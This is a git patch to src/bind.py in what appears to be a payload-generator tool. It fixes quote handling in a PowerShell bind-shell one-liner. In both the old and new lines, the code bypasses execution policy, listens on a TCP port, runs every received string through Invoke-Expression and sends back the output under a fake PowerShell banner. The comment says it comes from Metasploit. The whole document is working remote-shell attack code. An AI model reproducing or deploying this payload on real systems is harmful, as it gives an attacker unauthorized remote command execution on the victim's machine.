From c0b7f9724e7fef69b234b99e9692e7eb4bae0604 Mon Sep 17 00:00:00 2001 From: "Andre Marques (zc00l)" Date: Sat, 11 Aug 2018 15:19:50 -0300 Subject: [PATCH] Fixing PowerShell bind shell Quote confusion ... --- src/bind.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/bind.py b/src/bind.py index 377bc74..527dbfc 100644 --- a/src/bind.py +++ b/src/bind.py @@ -47,7 +47,7 @@ def BIND_NETCAT_TRADITIONAL_TCP(): def BIND_POWERSHELL_TCP(): - return """powershell.exe -nop -ep bypass -Command '$VAR1=PORT;$VAR2=[System.Net.Sockets.TcpListener]$VAR1;$VAR2.Start();$VAR3=$VAR2.AcceptTCPClient();$VAR4=$VAR3.GetStream();[byte[]]$VAR5=0..65535|%{0};$VAR6=([text.encoding]::ASCII).GetBytes(\\"Windows PowerShell running as user \\"+$env:username+\\" on \\"+$env:computername+\\"`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n\\");$VAR4.Write($VAR6,0,$VAR6.Length);$VAR6=([text.encoding]::ASCII).GetBytes(\\"PS \\"+(Get-Location).Path+\\"> \\");$VAR4.Write($VAR6,0,$VAR6.Length);while(($VAR7=$VAR4.Read($VAR5,0,$VAR5.Length)) -ne 0){$VAR8=([text.encoding]::ASCII).GetString($VAR5,0,$VAR7);try{$VAR9=(Invoke-Expression -command $VAR8 2>&1 | Out-String )}catch{Write-Warning \\"Something went wrong with execution of command on the target.\\";Write-Error $_;};$VAR10=$VAR9+ \\"PS \\"+(Get-Location).Path+\\"> \\";$VAR11=($error[0] | Out-String);$error.clear();$VAR10=$VAR10+$VAR11;$VAR6=([text.encoding]::ASCII).GetBytes($VAR10);$VAR4.Write($VAR6,0,$VAR6.Length);$VAR4.Flush();};$VAR3.Close();if($VAR2){$VAR2.Stop();};'""" + return """powershell.exe -nop -ep bypass -Command "$VAR1=PORT;$VAR2=[System.Net.Sockets.TcpListener]$VAR1;$VAR2.Start();$VAR3=$VAR2.AcceptTCPClient();$VAR4=$VAR3.GetStream();[byte[]]$VAR5=0..65535|%{0};$VAR6=([text.encoding]::ASCII).GetBytes('Windows PowerShell running as user '+$env:username+' on '+$env:computername+'`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n');$VAR4.Write($VAR6,0,$VAR6.Length);$VAR6=([text.encoding]::ASCII).GetBytes('PS '+(Get-Location).Path+'> ');$VAR4.Write($VAR6,0,$VAR6.Length);while(($VAR7=$VAR4.Read($VAR5,0,$VAR5.Length)) -ne 0){$VAR8=([text.encoding]::ASCII).GetString($VAR5,0,$VAR7);try{$VAR9=(Invoke-Expression -command $VAR8 2>&1 | Out-String )}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$VAR10=$VAR9+ 'PS '+(Get-Location).Path + '> ';$VAR11=($error[0] | Out-String);$error.clear();$VAR10=$VAR10+$VAR11;$VAR6=([text.encoding]::ASCII).GetBytes($VAR10);$VAR4.Write($VAR6,0,$VAR6.Length);$VAR4.Flush();};$VAR3.Close();if($VAR2){$VAR2.Stop();};" """ # Removed from MetasploitFramework